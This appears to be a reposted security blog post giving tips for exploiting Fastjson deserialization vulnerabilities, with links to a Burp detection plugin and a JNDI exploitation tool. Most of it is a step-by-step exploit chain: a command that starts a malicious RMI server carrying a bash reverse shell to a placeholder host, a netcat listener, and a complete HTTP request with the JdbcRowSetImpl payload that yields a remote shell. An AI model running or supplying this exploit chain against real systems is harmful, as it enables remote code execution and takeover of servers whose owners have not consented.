当前位置:网站首页>Fastjson vulnerability utilization techniques

Fastjson vulnerability utilization techniques

2022-06-24 16:08:00 Bypass

Every time I see json Data packets , Will inevitably think of Fastjson And vulnerabilities in multiple versions of it .

How to realize automatic detection and simplify attack steps , So as to improve the ability of vulnerability discovery , Make you more efficient Tips, Let's share with you .

01、 Automated vulnerability detection

Based on a BurpSuite Passive FastJson Test plug-in , This plug-in will help BurpSuite Coming in with json The request packet of data is detected .

Github Project address :

https://github.com/pmiaowu/BurpFastJsonScan

02、 Simplify attack steps

Here we can use a JNDI Service utilization tools , To simplify the fastjson Steps of vulnerability detection , Assist in vulnerability exploitation and penetration .

Github Project address :

https://github.com/wyzxxz/jndi_tool

Fstjson Exploit :

(1) Turn on RMI service 

java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/xxxx.xxx.xxx.xxx/12345 0>&1"

(2) Set listening server 

nc -lvvp 12345

(3) Construct request send payload

POST /login HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 111

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://xxx.xxx.xxx.xxx:1099/Object","autoCommit":true}

(4) Target system received POST request , Successful rebound shell.

原网站

版权声明
本文为[Bypass]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/175/202206241545216953.html

边栏推荐

猜你喜欢

随机推荐